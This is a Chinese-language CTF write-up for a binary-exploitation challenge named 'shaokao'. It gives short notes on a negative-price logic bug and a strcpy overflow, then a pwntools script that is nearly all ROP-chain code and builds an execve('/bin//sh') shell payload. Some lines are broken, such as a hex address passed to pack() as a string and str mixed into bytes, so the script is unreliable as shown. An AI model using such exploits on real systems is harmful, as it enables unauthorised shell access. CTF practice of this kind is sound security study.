一.shaokao
1.checksec
2.ida
去ida调试前看了眼程序,尝试买摊位,发现钱不够
点进去啤酒那里
发现这里的钱有漏洞,可以直接输入负数,钱不减反增。
又发现这里有strcpy函数,推测这里有溢出。
发现了系统调用函数
3.分析
那就是先买下摊位,再去改名,通过名字来溢出,实现系统调用。
先用ROPgaget来查找
4.exp.py
# _*_ coding:utf-8 _*_
from pwn import *
from struct import pack
#p = remote("123.56.116.45","18860")
r= process("./shaokao")
context.log_level = "debug"
r.sendlineafter(">",b"1")
r.sendlineafter("3. 勇闯天涯\n",b"1")
r.sendlineafter("?\n",b"-10000000")
r.sendlineafter(">",b"4")
r.sendlineafter(">",b"5")
pay= b'a'*(0x20+8)
pay += pack('<Q','0x000000000040a67e') # pop rsi ; ret
pay += pack('<Q', 0x00000000004e60e0)
pay += pack('<Q', 0x0000000000458827) # pop rax ; ret
pay += '/bin//sh'
pay += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
pay += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
pay += pack('<Q', 0x00000000004e60e8)
pay += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
pay += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
pay += pack('<Q', 0x000000000040264f) # pop rdi ; ret
pay += pack('<Q', 0x00000000004e60e0)
pay += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
pay += pack('<Q', 0x00000000004e60e8)
pay += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
pay += pack('<Q', 0x00000000004e60e8)
pay += pack('<Q', 0x4141414141414141)
pay += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
pay += pack('<Q', 0x0000000000402404) # syscall
r.sendlineafter("烧烤摊儿已归你所有,请赐名:",pay)
r.interactive()